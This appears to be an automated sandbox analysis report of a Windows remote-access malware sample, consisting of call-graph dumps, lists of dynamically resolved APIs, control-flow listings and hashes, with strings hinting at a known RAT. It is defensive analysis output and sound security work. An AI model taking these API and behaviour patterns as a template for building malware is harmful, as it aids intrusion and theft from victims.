__alldvrm __cftoe 66421->66424 66426 448817 11 API calls 2 library calls 66421->66426 66424->66418 66425->66424 66426->66424 66430 41b847 ctype ___scrt_fastfail 66427->66430 66428 402093 28 API calls 66429 414e97 66428->66429 66429->65929 66430->66428 66431->65946 66433 414e50 WSASetLastError 66432->66433 66434 414e46 66432->66434 66433->66011 66582 414cd4 29 API calls ___std_exception_copy 66434->66582 66437 414e4b 66437->66433 66439 404846 socket 66438->66439 66440 404839 66438->66440 66442 404860 CreateEventW 66439->66442 66443 404842 66439->66443 66583 40489e WSAStartup 66440->66583 66442->66011 66443->66011 66444 40483e 66444->66439 66444->66443 66446 404f65 66445->66446 66447 404fe6 66445->66447 66448 404f6e 66446->66448 66449 404fc0 CreateEventA 66446->66449 66450 404f7d GetLocalTime 66446->66450 66447->66011 66448->66449 66449->66447 66451 41badc 28 API calls 66450->66451 66452 404f91 66451->66452 66584 4052fd 28 API calls 66452->66584 66461 404a1b 66460->66461 66462 4048ee 66460->66462 66463 40497e 66461->66463 66464 404a21 WSAGetLastError 66461->66464 66462->66463 66466 40531e 28 API calls 66462->66466 66486 404923 66462->66486 66463->66011 66464->66463 66465 404a31 66464->66465 66467 404932 66465->66467 66468 404a36 66465->66468 66470 40490f 66466->66470 66473 402093 28 API calls 66467->66473 66590 41ca2f 30 API calls 66468->66590 66474 402093 28 API calls 66470->66474 66472 40492b 66472->66467 66476 404941 66472->66476 66477 404a80 66473->66477 66478 40491e 66474->66478 66475 404a40 66591 4052fd 28 API calls 66475->66591 66483 404950 66476->66483 66484 404987 66476->66484 66480 402093 28 API calls 66477->66480 66481 41b43d 80 API calls 66478->66481 66485 404a8f 66480->66485 66481->66486 66488 402093 28 API calls 66483->66488 66587 42198e 54 API calls 66484->66587 66489 41b43d 80 API calls 66485->66489 66585 420bae 27 API calls 66486->66585 66492 40495f 66488->66492 66489->66463 66498 402093 28 API calls 66492->66498 66493 40498f 66495 4049c4 66493->66495 66496 404994 66493->66496 66589 420d54 28 API calls 66495->66589 66499 402093 28 API calls 66496->66499 66501 40496e 66498->66501 66503 4049a3 66499->66503 66504 41b43d 80 API calls 66501->66504 66506 402093 28 API calls 66503->66506 66507 404973 66504->66507 66505 4049cc 66508 4049f9 CreateEventW CreateEventW 66505->66508 66510 402093 28 API calls 66505->66510 66509 4049b2 66506->66509 66586 41e65f DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 66507->66586 66508->66463 66511 41b43d 80 API calls 66509->66511 66513 4049e2 66510->66513 66514 4049b7 66511->66514 66515 402093 28 API calls 66513->66515 66588 421000 52 API calls 66514->66588 66516 4049f1 66515->66516 66518 41b43d 80 API calls 66516->66518 66519 4049f6 66518->66519 66519->66508 66592 41b704 GlobalMemoryStatusEx 66520->66592 66522 41b743 66522->66011 66593 4144ce 66523->66593 66527 441dcd 66526->66527 66622 441bbd 66527->66622 66529 441dee 66529->66011 66531 40dcf3 66530->66531 66532 41344d 3 API calls 66531->66532 66534 40dcfa 66532->66534 66533 40dd12 66533->66011 66534->66533 66535 413497 3 API calls 66534->66535 66535->66533 66537 4020b7 28 API calls 66536->66537 66538 41bba5 66537->66538 66538->66011 66540 441dc1 20 API calls 66539->66540 66541 41bb00 66540->66541 66542 402093 28 API calls 66541->66542 66543 41bb0e 66542->66543 66543->66011 66545 41ba4a GetTickCount 66544->66545 66545->66011 66547 436dd0 ___scrt_fastfail 66546->66547 66548 41ba03 GetForegroundWindow GetWindowTextW 66547->66548 66549 40417e 28 API calls 66548->66549 66550 41ba2d 66549->66550 66550->66011 66552 402093 28 API calls 66551->66552 66553 40f844 66552->66553 66553->66011 66555 4020df 11 API calls 66554->66555 66556 402f3d 66555->66556 66557 4032a0 28 API calls 66556->66557 66558 402f59 66557->66558 66558->66011 66560 4020df 11 API calls 66559->66560 66561 404c27 66560->66561 66562 4020df 11 API calls 66561->66562 66564 404c30 66562->66564 66563 43bc91 new 21 API calls 66563->66564 66564->66563 66566 4020b7 28 API calls 66564->66566 66567 404ca1 66564->66567 66568 401fe2 28 API calls 66564->66568 66571 401fd8 11 API calls 66564->66571 66627 404b96 66564->66627 66633 404cc3 66564->66633 66566->66564 66646 404e26 99 API calls 66567->66646 66568->66564 66570 404ca8 66572 401fd8 11 API calls 66570->66572 66571->66564 66573 404cb1 66572->66573 66574 401fd8 11 API calls 66573->66574 66575 404cba 66574->66575 66575->66011 66577->66011 66578->65973 66580->66011 66581->65973 66582->66437 66583->66444 66585->66472 66586->66463 66587->66493 66588->66507 66589->66505 66590->66475 66592->66522 66596 4144a1 66593->66596 66597 4144b6 ___scrt_initialize_default_local_stdio_options 66596->66597 66600 43f6dd 66597->66600 66603 43c430 66600->66603 66604 43c470 66603->66604 66605 43c458 66603->66605 66604->66605 66607 43c478 66604->66607 66618 44051d 20 API calls __dosmaperr 66605->66618 66608 43a6f7 __cftoe 36 API calls 66607->66608 66609 43c488 66608->66609 66619 43cbb6 20 API calls 2 library calls 66609->66619 66610 43c45d __cftoe 66611 434f2b CatchGuardHandler 5 API calls 66610->66611 66613 4144c4 66611->66613 66613->66011 66614 43c500 66620 43d224 51 API calls 3 library calls 66614->66620 66617 43c50b 66621 43cc20 20 API calls _free 66617->66621 66618->66610 66619->66614 66620->66617 66621->66610 66623 441bd4 66622->66623 66625 441c0b __cftoe 66623->66625 66626 44051d 20 API calls __dosmaperr 66623->66626 66625->66529 66626->66625 66628 404ba0 WaitForSingleObject 66627->66628 66629 404bcd recv 66627->66629 66647 420fc4 54 API calls 66628->66647 66631 404be0 66629->66631 66631->66564 66632 404bbc SetEvent 66632->66631 66634 4020df 11 API calls 66633->66634 66640 404cde 66634->66640 66635 404e13 66636 401fd8 11 API calls 66635->66636 66637 404e1c 66636->66637 66637->66564 66638 401fe2 28 API calls 66638->66640 66639 401fd8 11 API calls 66639->66640 66640->66635 66640->66638 66640->66639 66641 4020f6 28 API calls 66640->66641 66642 401fc0 28 API calls 66640->66642 66645 4041a2 28 API calls 66640->66645 66641->66640 66643 404dad CreateEventA 66642->66643 66644 404dcd WaitForSingleObject FindCloseChangeNotification 66643->66644 66644->66640 66645->66640 66646->66570 66647->66632 66649 401f8e 66648->66649 66650 402252 11 API calls 66649->66650 66651 401f99 66650->66651 66651->66034 66651->66035 66651->66047 66652->66039 66653->66068 66654->66067 66655->66056 66656->66062 66657->66066 66660 40f710 66658->66660 66659 413497 3 API calls 66659->66660 66660->66659 66661 40f7b4 66660->66661 66664 40f7a4 Sleep 66660->66664 66680 40f742 66660->66680 66663 40905c 28 API calls 66661->66663 66662 40905c 28 API calls 66662->66680 66666 40f7bf 66663->66666 66664->66660 66665 41bbac 28 API calls 66665->66680 66668 41bbac 28 API calls 66666->66668 66669 40f7cb 66668->66669 66693 413762 14 API calls 66669->66693 66672 401f09 11 API calls 66672->66680 66673 40f7de 66674 401f09 11 API calls 66673->66674 66676 40f7ea 66674->66676 66675 402093 28 API calls 66675->66680 66677 402093 28 API calls 66676->66677 66678 40f7fb 66677->66678 66681 4136bd 14 API calls 66678->66681 66679 4136bd 14 API calls 66679->66680 66680->66662 66680->66664 66680->66665 66680->66672 66680->66675 66680->66679 66691 40cfe4 112 API calls ___scrt_fastfail 66680->66691 66692 413762 14 API calls 66680->66692 66682 40f80e 66681->66682 66694 41279e TerminateProcess WaitForSingleObject 66682->66694 66684 40f816 ExitProcess 66692->66680 66693->66673 66694->66684 66695 4436bc 66696 4436c5 66695->66696 66697 4436de 66695->66697 66698 4436cd 66696->66698 66702 443744 66696->66702 66700 4436d5 66700->66698 66713 443a11 22 API calls 2 library calls 66700->66713 66703 443750 66702->66703 66704 44374d 66702->66704 66714 44f31e GetEnvironmentStringsW 66703->66714 66704->66700 66708 446642 _free 20 API calls 66709 443792 66708->66709 66709->66700 66710 443768 66711 446642 _free 20 API calls 66710->66711 66712 44375d 66711->66712 66712->66708 66713->66697 66715 44f332 66714->66715 66716 443757 66714->66716 66717 446077 ___crtLCMapStringA 21 API calls 66715->66717 66716->66712 66721 443869 26 API calls 3 library calls 66716->66721 66718 44f346 ctype 66717->66718 66719 446642 _free 20 API calls 66718->66719 66720 44f360 FreeEnvironmentStringsW 66719->66720 66720->66716 66721->66710 66722 415a38 66723 4020f6 28 API calls 66722->66723 66724 415a5a SetEvent 66723->66724 66725 415a6f 66724->66725 66726 4041a2 28 API calls 66725->66726 66727 415a89 66726->66727 66728 4020f6 28 API calls 66727->66728 66729 415a99 66728->66729 66730 4020f6 28 API calls 66729->66730 66731 415aab 66730->66731 66732 41bd69 28 API calls 66731->66732 66733 415ab4 66732->66733 66734 415ad4 GetTickCount 66733->66734 66735 415c33 66733->66735 66799 415c24 66733->66799 66737 41badc 28 API calls 66734->66737 66735->66799 66800 415c47 66735->66800 66736 401e8d 11 API calls 66738 416fe0 66736->66738 66739 415ae5 66737->66739 66740 401fd8 11 API calls 66738->66740 66742 41ba34 GetTickCount 66739->66742 66743 416fec 66740->66743 66745 415af1 66742->66745 66746 401fd8 11 API calls 66743->66746 66744 415c17 66744->66799 66747 41badc 28 API calls 66745->66747 66748 416ff8 66746->66748 66749 415afc 66747->66749 66750 41b9e4 30 API calls 66749->66750 66751 415b0a 66750->66751 66801 41bc6c 66751->66801 66754 401e65 22 API calls 66755 415b26 66754->66755 66756 402f31 28 API calls 66755->66756 66757 415b34 66756->66757 66805 402ea1 66757->66805 66760 402f10 28 API calls 66761 415b52 66760->66761 66762 402ea1 28 API calls 66761->66762 66763 415b61 66762->66763 66764 402f10 28 API calls 66763->66764 66765 415b6d 66764->66765 66766 402ea1 28 API calls 66765->66766 66767 415b77 66766->66767 66768 404aa1 61 API calls 66767->66768 66769 415b86 66768->66769 66770 401fd8 11 API calls 66769->66770 66771 415b8f 66770->66771 66772 401fd8 11 API calls 66771->66772 66773 415b9b 66772->66773 66774 401fd8 11 API calls 66773->66774 66775 415ba7 66774->66775 66776 401fd8 11 API calls 66775->66776 66777 415bb3 66776->66777 66778 401fd8 11 API calls 66777->66778 66779 415bbf 66778->66779 66780 401fd8 11 API calls 66779->66780 66781 415bcb 66780->66781 66782 401f09 11 API calls 66781->66782 66783 415bd4 66782->66783 66784 401fd8 11 API calls 66783->66784 66785 415bdd 66784->66785 66786 401fd8 11 API calls 66785->66786 66787 415be6 66786->66787 66788 401e65 22 API calls 66787->66788 66789 415bf1 66788->66789 66790 43b9ec _strftime 40 API calls 66789->66790 66791 415bfe 66790->66791 66792 415c03 66791->66792 66793 415c29 66791->66793 66795 415c11 66792->66795 66796 415c1c 66792->66796 66794 401e65 22 API calls 66793->66794 66794->66735 66814 404ff4 82 API calls 66795->66814 66798 404f51 82 API calls 66796->66798 66798->66799 66799->66736 66815 4050e4 84 API calls 66800->66815 66802 41bc79 66801->66802 66803 4020b7 28 API calls 66802->66803 66804 415b18 66803->66804 66804->66754 66810 402eb0 66805->66810 66806 402ef2 66807 401fb0 28 API calls 66806->66807 66808 402ef0 66807->66808 66809 402055 11 API calls 66808->66809 66811 402f09 66809->66811 66810->66806 66812 402ee7 66810->66812 66811->66760 66816 403365 28 API calls 66812->66816 66814->66744 66815->66744 66816->66808 66817 44368d 66818 443696 66817->66818 66819 4436af 66817->66819 66820 44369e 66818->66820 66824 4436eb 66818->66824 66822 4436a6 66822->66820 66837 443992 22 API calls 2 library calls 66822->66837 66825 4436f4 66824->66825 66826 4436f7 66824->66826 66825->66822 66827 44ef19 49 API calls 66826->66827 66828 4436fe 66827->66828 66838 44f29b GetEnvironmentStringsW 66828->66838 66831 443709 66833 446642 _free 20 API calls 66831->66833 66834 44373e 66833->66834 66834->66822 66835 443714 66836 446642 _free 20 API calls 66835->66836 66836->66831 66837->66819 66839 44f2b2 66838->66839 66849 44f305 66838->66849 66842 44f2b8 WideCharToMultiByte 66839->66842 66840 443703 66840->66831 66850 443798 26 API calls 4 library calls 66840->66850 66841 44f30e FreeEnvironmentStringsW 66841->66840 66843 44f2d4 66842->66843 66842->66849 66844 446077 ___crtLCMapStringA 21 API calls 66843->66844 66845 44f2da 66844->66845 66846 44f2e1 WideCharToMultiByte 66845->66846 66847 44f2f7 66845->66847 66846->66847 66848 446642 _free 20 API calls 66847->66848 66848->66849 66849->66840 66849->66841 66850->66835 66851 43bd98 66853 43bda4 _swprintf CallCatchBlock 66851->66853 66852 43bdb2 66867 44051d 20 API calls __dosmaperr 66852->66867 66853->66852 66856 43bddc 66853->66856 66855 43bdb7 __cftoe CallCatchBlock 66862 4457c8 EnterCriticalSection 66856->66862 66858 43bde7 66863 43be88 66858->66863 66862->66858 66864 43be96 66863->66864 66866 43bdf2 66864->66866 66869 44962c 37 API calls 2 library calls 66864->66869 66868 43be0f LeaveCriticalSection std::_Lockit::~_Lockit 66866->66868 66867->66855 66868->66855 66869->66864 66870 448159 GetLastError 66871 448172 66870->66871 66874 448178 66870->66874 66889 44867c 11 API calls 2 library calls 66871->66889 66872 445a33 __Getctype 17 API calls 66875 44818a 66872->66875 66874->66872 66876 4481cf SetLastError 66874->66876 66877 448192 66875->66877 66890 4486d2 11 API calls 2 library calls 66875->66890 66878 4481d8 66876->66878 66880 446642 _free 17 API calls 66877->66880 66882 448198 66880->66882 66881 4481a7 66881->66877 66883 4481ae 66881->66883 66884 4481c6 SetLastError 66882->66884 66891 447f47 20 API calls __dosmaperr 66883->66891 66884->66878 66886 4481b9 66887 446642 _free 17 API calls 66886->66887 66888 4481bf 66887->66888 66888->66876 66888->66884 66889->66874 66890->66881 66891->66886

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E92F), ref: 0041CAB3
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CABC
                                                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E92F), ref: 0041CAD3
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CAD6
                                                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E92F), ref: 0041CAE8
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CAEB
                                                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E92F), ref: 0041CAFC
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CAFF
                                                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E92F), ref: 0041CB11
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB14
                                                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E92F), ref: 0041CB20
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB23
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E92F), ref: 0041CB34
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB37
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E92F), ref: 0041CB48
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB4B
                                                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E92F), ref: 0041CB5C
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB5F
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E92F), ref: 0041CB70
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB73
                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E92F), ref: 0041CB84
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB87
                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E92F), ref: 0041CB98
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB9B
                                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E92F), ref: 0041CBAC
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBAF
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E92F), ref: 0041CBC0
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBC3
                                                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E92F), ref: 0041CBD1
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBD4
                                                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E92F), ref: 0041CBE5
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBE8
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E92F), ref: 0041CBF5
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBF8
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E92F), ref: 0041CC05
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC08
                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E92F), ref: 0041CC1A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC1D
                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E92F), ref: 0041CC2A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC2D
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E92F), ref: 0041CC3E
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC41
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E92F), ref: 0041CC52
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC55
                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040E92F), ref: 0041CC67
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC6A
                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E92F), ref: 0041CC77
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E92F), ref: 0041CC87
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC8A
                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E92F), ref: 0041CC97
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                • API String ID: 4236061018-3687161714
                                                                                                • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                                                • Instruction ID: 2b824bf11641892101ffcf30fc9d4a2e3bc4459fb66bd3e79e5053c137ea286e
                                                                                                • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                                                • Instruction Fuzzy Hash: A741BEA0EC035879DA10BBB66CCDE3B3E5CD9857953214837B15CA3150EBBCD8408EAE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 00413497: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004134B7
                                                                                                  • Part of subcall function 00413497: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004134D5
                                                                                                  • Part of subcall function 00413497: RegCloseKey.KERNEL32(?), ref: 004134E0
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040F7A9
                                                                                                • ExitProcess.KERNEL32 ref: 0040F818
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                • String ID: 4.9.2 Pro$override$pth_unenc
                                                                                                • API String ID: 2281282204-2269537927
                                                                                                • Opcode ID: 985771a873a95799bcc2eac2c82e6424fc8be46f8441abce2765580d4795feb4
                                                                                                • Instruction ID: 52d9c995ea664f7604ce00e7e8ce505d170626c6ddf5349e6a99aaaa1312c2d2
                                                                                                • Opcode Fuzzy Hash: 985771a873a95799bcc2eac2c82e6424fc8be46f8441abce2765580d4795feb4
                                                                                                • Instruction Fuzzy Hash: 6C210271B0430167C614BA7A8C5BAAE39999B81718F50003FF40A676D7EF7C8E0483AF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,0041544A,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.2 Pro), ref: 0040F833
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00034AA1,004347C8), ref: 00434A9A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: 14e8cb0cbb81bd441872974e3896e3a58f7002f9ff1e7d34040d74437857d637
                                                                                                • Instruction ID: bededb24876f54f8b14d1792734d10542b4b71307cd25d94af771e4df3ea9f72
                                                                                                • Opcode Fuzzy Hash: 14e8cb0cbb81bd441872974e3896e3a58f7002f9ff1e7d34040d74437857d637
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 5 40e913-40e995 call 41ca9e GetModuleFileNameW call 40f311 call 4020f6 * 2 call 41bd69 call 40fa65 call 401e8d call 43fc40 22 40e9e1-40eaa9 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40e997-40e9dc call 40fb01 call 401e65 call 401fab call 410e85 call 40fab2 call 40f2fe 5->23 69 40eaab-40eaf6 call 406c1e call 401fe2 call 401fd8 call 401fab call 413497 22->69 70 40eafc-40eb17 call 401e65 call 40b90b 22->70 49 40ee40-40ee51 call 401fd8 23->49 69->70 102 40f29d-40f2b8 call 401fab call 4138f7 call 4123c3 69->102 80 40eb51-40eb58 call 40cfb7 70->80 81 40eb19-40eb38 call 401fab call 413497 70->81 90 40eb61-40eb68 80->90 91 40eb5a-40eb5c 80->91 81->80 97 40eb3a-40eb50 call 401fab call 4138f7 81->97 95 40eb6a 90->95 96 40eb6c-40eb78 call 41b211 90->96 94 40ee3f 91->94 94->49 95->96 103 40eb81-40eb85 96->103 104 40eb7a-40eb7c 96->104 97->80 126 40f2bd-40f2ee call 41bbac call 401f04 call 413971 call 401f09 * 2 102->126 107 40ebc4-40ebd7 call 401e65 call 401fab 103->107 108 40eb87 call 407716 103->108 104->103 127 40ebd9 call 407755 107->127 128 40ebde-40ec66 call 401e65 call 41bbac call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->128 117 40eb8c-40eb8e 108->117 120 40eb90-40eb95 call 407738 call 407260 117->120 121 40eb9a-40ebad call 401e65 call 401fab 117->121 120->121 121->107 140 40ebaf-40ebb5 121->140 157 40f2f3-40f2fd call 40dc90 call 414e78 126->157 127->128 177 40ec68-40ec81 call 401e65 call 401fab call 43ba16 128->177 178 40ecce-40ecd2 128->178 140->107 144 40ebb7-40ebbd 140->144 144->107 147 40ebbf call 407260 144->147 147->107 177->178 205 40ec83-40ecc9 call 401e65 call 401fab call 401e65 call 401fab call 40d982 call 401f13 call 401f09 177->205 180 40ee54-40eeb4 call 436dd0 call 40247c call 401fab * 2 call 413646 call 409057 178->180 181 40ecd8-40ecdf 178->181 236 40eeb9-40ef0d call 401e65 call 401fab call 402093 call 401fab call 4136bd call 401e65 call 401fab call 43b9ec 180->236 184 40ece1-40ed5b call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cd47 181->184 185 40ed5d-40ed67 call 409057 181->185 191 40ed6c-40ed90 call 40247c call 4346e6 184->191 185->191 212 40ed92-40ed9d call 436dd0 191->212 213 40ed9f 191->213 205->178 218 40eda1-40edec call 401f04 call 43f749 call 40247c call 401fab call 40247c call 401fab call 413895 212->218 213->218 273 40edf1-40ee16 call 4346ef call 401e65 call 40b90b 218->273 287 40ef2a-40ef2c 236->287 288 40ef0f 236->288 273->236 286 40ee1c-40ee3b call 401e65 call 41bbac call 40f3c2 273->286 286->236 306 40ee3d 286->306 289 40ef32 287->289 290 40ef2e-40ef30 287->290 292 40ef11-40ef28 call 41cce9 CreateThread 288->292 294 40ef38-40f014 call 402093 * 2 call 41b43d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43b9ec call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->292 292->294 344 40f016-40f04d call 434438 call 401e65 call 401fab CreateThread 294->344 345 40f04f 294->345 306->94 347 40f051-40f069 call 401e65 call 401fab 344->347 345->347 357 40f0a7-40f0ba call 401e65 call 401fab 347->357 358 40f06b-40f0a2 call 434438 call 401e65 call 401fab CreateThread 347->358 368 40f11a-40f12d call 401e65 call 401fab 357->368 369 40f0bc-40f115 call 401e65 call 401fab call 401e65 call 401fab call 40d936 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f168-40f18c call 41b55b call 401f13 call 401f09 368->379 380 40f12f-40f163 call 401e65 call 401fab call 401e65 call 401fab call 43b9ec call 40c0b0 368->380 369->368 400 40f191-40f1a4 CreateThread 379->400 401 40f18e-40f18f SetProcessDEPPolicy 379->401 380->379 404 40f1b2-40f1b9 400->404 405 40f1a6-40f1b0 CreateThread 400->405 401->400 408 40f1c7-40f1ce 404->408 409 40f1bb-40f1c5 CreateThread 404->409 405->404 412 40f1d0-40f1d3 408->412 413 40f1dc 408->413 409->408 415 40f1d5-40f1da 412->415 416 40f21a-40f22d call 401fab call 41344d 412->416 418 40f1e1-40f215 call 402093 call 4052fd call 402093 call 41b43d call 401fd8 413->418 415->418 425 40f232-40f235 416->425 418->416 425->157 427 40f23b-40f27b call 41bbac call 401f04 call 413569 call 401f09 call 401f04 425->427 443 40f294-40f299 DeleteFileW 427->443 444 40f29b 443->444 445 40f27d-40f280 443->445 444->126 445->126 446 40f282-40f28f Sleep call 401f04 445->446 446->443
                                                                                                APIs
                                                                                                  • Part of subcall function 0041CA9E: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E92F), ref: 0041CAB3
                                                                                                  • Part of subcall function 0041CA9E: GetProcAddress.KERNEL32(00000000), ref: 0041CABC
